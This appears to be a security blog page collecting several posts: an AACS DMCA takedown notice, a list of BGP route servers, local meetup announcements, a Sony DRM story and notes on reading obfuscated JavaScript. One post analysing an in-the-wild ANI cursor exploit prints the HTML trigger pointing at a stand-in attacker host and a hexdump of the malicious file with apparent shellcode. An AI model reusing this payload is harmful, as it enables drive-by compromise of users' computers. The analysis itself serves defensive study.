official unlegal color palette

Available at
search for “append c0”

append c0

unlegal color palette?


AACS Takedown notice forces blogger to alter content

The take down notice from AACS has caused one blogger to alter the contents of his blog which is located at this url:…
The AACS has taken issue with the magic key which is a 16 digit hexadecimal code that can unlock HD DVD and allow for lawful backups or unlawful copying.

Here is a screenshot of the altered blog
aacs processing key blog post

AACS starts sending take down notices over Processing Key

According to Chilling Effects the take down notices have started flowing in the latest round of battle over the HD format. More information about AACS can be found on Ed Felten’s Blog series:
1, 2, 3, 4, 5, 6, 7, 8, 9

Alex wrote on Thursday about the next step in the breakdown of AACS, the encryption scheme used on next-gen DVD discs (HD-DVD and Blu-ray): last week a person named Arnezami discovered and published a processing key that apparently can be used to decrypt all existing discs.

The notice will be posted here in its entirety

Sender Information:
Advanced Access Content System Licensing Administrator, LLC (AACS LA)
Sent by: [Private]
Proskauer Rose LLP
New York, NY, 10038, USA

Recipient Information:
Google Inc.
1600 Amphitheatre Pkwy.
Mountain View, CA, 94043, USA

Sent via: express mail
Re: Illegal Offering of Processing Key to Circumvent AACS Copyright Protection…………]

Dear Google Inc.

We represent Advanced Access Content System Licensing Administrator, LLC (AACS LA), developer, proprietor and licensor of the Advanced Access Content System (AACS). AACS is an integrated set of technological protection measures that controls access to and prevents unauthorized copying of copyrighted motion pictures embodied on high definition DVDs.

It is our understanding that you are providing to the public the above-identified tools and services at the above referenced URL, and are thereby providing and offering to the public a technology, product, service, device, component, or part thereof that is primarily designed, produced, or marketed for the purpose of circumventing the technological protection measures afforded by AACS (hereafter, the “circumvention offering”). Doing so constitutes a violation of the anti-circumvention provisions of the Digital Millennium Copyright Act (the “DMCA”), 17 U.S.C. §§ 1201(a)(2) and 1201(b)(1). Providing or offering the circumvention offering identified above, and any other such offering that is primarily designed or produced to circumvent protection measures, or which has only limited commercial significant purpose other than to circumvent, or which are offered to the public with knowledge that it is for use in circumventing, violates the rights of AACS and any others harmed as well. See §§ 1201(a)(2), 1201(b)(1), and 1203.

In view of the foregoing apparent anti-circumvention violations, we demand that you immediately:

1) remove or cause to be removed the above-specified AACS circumvention offering and any other circumvention offering which is designed, produced or provided to circumvent AACS or to assist others in doing so, and/or any links directly thereto, from the URL identified above and from any other forum or website on which you have provided any circumvention offering; and

2) refrain from posting or causing to be provided any AACS circumvention offering or from assisting others in doing so, including by direct links thereto, on any website now or at any time in the future.

Failure to do so will subject you to legal liability.

Please confirm to the undersigned in writing no later than noon a week from the above-indicated date that you have complied with these demands. You may reach the undersigned by telephone at [private] or by email at [private] AACS LA reserves all further rights and remedies with respect to this matter.

Very truly yours,

Counsel for AACS LA

Calculating an ASNs IP Space

I couldn’t think of a good easy way to save a bunch of telnet addresses so I’m just going to blog them. I’m using BGP tables to calculate the theoretical IP space a given ASN has. I parse the table and use the CIDR notation to calculate how big the space can be and then tally each AS Number. It’s a useful metric for an analysis I’m conducting on the infection rate of badware however BGP tables differ from router to router. So I was finally pointed to a “looking glass” page which had a nice collection of public interfaces I could dump from!

BGP Route Servers (telnet access)

  1. RouteViews Project (collection)
  2. ATT Route Server (AS7018)
  3. CerfNet Route Server (AS1838)
  4. Colt Internet Route Server (AS8220)
  5. Exodus Communications USA Route Server (AS3967)
  6. Global Crossing Route Server (AS3549)
  7. Group Telecom Route Server (AS6539)
  8. Hurricane Electric Route Server (AS6939)
  9. Oregon Exchange Route Server (AS3582)
  10. Planet Online Route Server (AS5388)
  11. SAVVIS Communications Route Server (AS3561)
  12. SixXS GRH Route Server (SixXS IPv6 Project)
  13. TELUS Eastern Canada Route Server (AS852)
  14. TELUS Western Canada Route Server (AS852)
  15. Tiscali Route Server (AS3257)

While I’m taking notes for myself, the command to disable paging is:
‘term length 0’
and the command to dump the table is:
‘show ip bgp’

Beansec 8 (or 9.. I’ve lost count)

The next Beansec! is imminent and one of the tripartite forces of the Beansec! has provided a Google calendar to help keep track.
If you are afraid of Google owning your calendaring information then scribble Wednesday down on some tin foil along with this description:

BeanSec! is an informal meetup of information security professionals, researchers and academics in the Greater Boston area. Unlike other meetings, you will not be expected to pay dues, “join up”, present a zero-day exploit, or defend your dissertation to attend.

Map to the Enormous Room in Cambridge.

Enormous Room: 567 Mass Ave, Cambridge 02139

Sony DVD DRM breaks own DVD Player.

Sony has released another DRM scheme on at least two known DVDs which will cause certain DVD hardware players to crash. The irony is that one of the models is a recent Sony DVP-CX995V and no updated firmware is available as of yet. No word on whether the DRM from Sony will crash other brands or models. More importantly no word on whether the DRM has made any significant dent in the ability to make copies of the movies in question. If you see “Stranger than Fiction” or “The Holiday” on a bit torrent site or usenet then Sony has failed.

Beansec next Wednesday

Yesterday was the 2nd Wednesday of the month which means only one week till Beansec!

BeanSec! is an informal meetup of information security professionals, researchers and academics in the Greater Boston area. Unlike other meetings, you will not be expected to pay dues, “join up”, present a zero-day exploit, or defend your dissertation to attend.

Map to the Enormous Room in Cambridge.

Enormous Room: 567 Mass Ave, Cambridge 02139


ANI Exploit in the wild

<DIV style=”CURSOR: url(‘http://EVIL.SITE/x/anifile.php’)”></DIV>

This was found after unraveling a few layers of dense javascript obfuscation.

function dF(s)
var s1 = unescape(s.substr(0,s.length-1));
var t='';
for (i=0;i < s1.length;i++) t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));


oday@silver-surfer:~$ hexdump anifile.php
0000000 4952 4646 4022 0000 4341 4e4f 6e61 6869
0000010 0024 0000 0024 0000 ffff 0000 0009 0000
0000020 0000 0000 0000 0000 0000 0000 0000 0000
0000030 0004 0000 0001 0000 5354 4c49 0003 0000
0000040 0000 0000 5354 4c49 0004 0000 0202 0202
0000050 6e61 6869 0052 0000 3130 3332 3130 3332
0000060 3130 3332 3130 3332 3130 3332 3130 3332
0000070 3130 3332 3130 3332 3400 3434 3434 3434
0000080 3434 3434 3434 3434 3434 3434 3434 3434
0000090 3434 3434 0000 0000 0000 0000 0000 0000
00000a0 0000 0000 0000 0000 25ba ec8b 8b64 3015
00000b0 0000 8d00 0352 3a80 0f01 c884 0000 c600
00000c0 0102 4be8 0001 6800 0300 0000 006a d0ff
00000d0 00b9 0003 8b00 ebf8 5e05 a4f3 d0ff f6e8
00000e0 ffff ebff 5717 8be8 0001 8b00 33f8 49c9
00000f0 c033 c3b0 f2fc 8dae ff47 c35f f5e9 0001
0000100 5b00 ec81 0114 0000 d48b c73e 6302 646d
0000110 3e20 42c7 2f04 2063 8322 08c2 c033 5050
0000120 0468 0001 5200 5053 21e8 0001 ff00 8bd0
0000130 8bfc 83c7 08c0 8a3e 8418 74db 4003 f6eb
0000140 c63e 2200 d233 883e 0150 ec83 3354 33c0
0000150 8bdb 83cc 54f8 097d 893e 011c c083 eb04
0000160 8bf2 8bcc 83d9 10c3 c033 c73e 2c43 0001
0000170 0000 5351 5050 5050 5050 5057 b9e8 0000
0000180 e800 0004 0000 6a90 c300 3880 7455 810f
0000190 0578 9090 9090 0674 8b55 8dec 0540 e0ff
00001a0 6f68 006e 6800 5255 6d4c 12eb 448d 0424
00001b0 e850 ff2f ffff e850 00a6 0000 cceb e9e8
00001c0 ffff 83ff 08c4 6ac3 686c 746e 6c64 12eb
00001d0 448d 0424 e850 ff0b ffff e850 0082 0000
00001e0 a8eb e9e8 ffff 83ff 08c4 68c3 3233 0000
00001f0 7568 6573 eb72 8d12 2444 5004 e4e8 fffe
0000200 50ff 5be8 0000 eb00 e881 ffe9 ffff c483
0000210 c308 5fe8 0000 6800 97ec 0c03 e850 007a
0000220 0000 c483 c308 4be8 0000 6800 fcaa 7c0d
0000230 e850 0066 0000 c483 c308 37e8 0000 6800
0000240 fe72 16b3 e850 0052 0000 c483 c308 4de8
0000250 ffff 68ff ef4f 054f e850 003e 0000 c483
0000260 c308 0fe8 0000 6800 4e8e ec0e e850 002a
0000270 0000 c483 c308 c033 8b64 3040 c085 1078
0000280 8b3e 0c40 8b3e 1c70 3ead 408b c308 0beb
0000290 8b3e 3440 c083 3e7c 408b c33c 3660 6c8b
00002a0 2424 8b36 3c45 8b36 0554 0378 3ed5 4a8b
00002b0 3e18 5a8b 0320 e3dd 493b 8b3e 8b34 f503
00002c0 ff33 c033 acfc c084 0774 cfc1 030d ebf8
00002d0 36f4 7c3b 2824 df75 8b3e 245a dd03 3e66
00002e0 0c8b 3e4b 5a8b 031c 3edd 048b 038b 36c5
00002f0 4489 1c24 c361 06e8 fffe 68ff 7474 3a70
0000300 2f2f 6568 6e72 7465 692e 666e 2f6f 2f78
0000310 6966 656c 702e 7068

Interesting technique for reading obfuscated javascript

I have some tricks that I use to unravel obfuscated code but came upon this one tonight from dwesemann at

function showme(txt) {
document.write(“<textarea rows=”50″ cols=”50″>”);document.write(txt); document.write(“</textarea>”);

It’s nice in that you simply replace escape or document.write(ln) with showme and it will create a text box. I normally use the extremely lazy method of replacing those methods with alert. It’s super safe and simple to type. I may adapt this into my routine though. Props to dwesemann on this.

BTW as a note to browser developers could you PLEASE let me select text from alerts that I could copy to clipboard?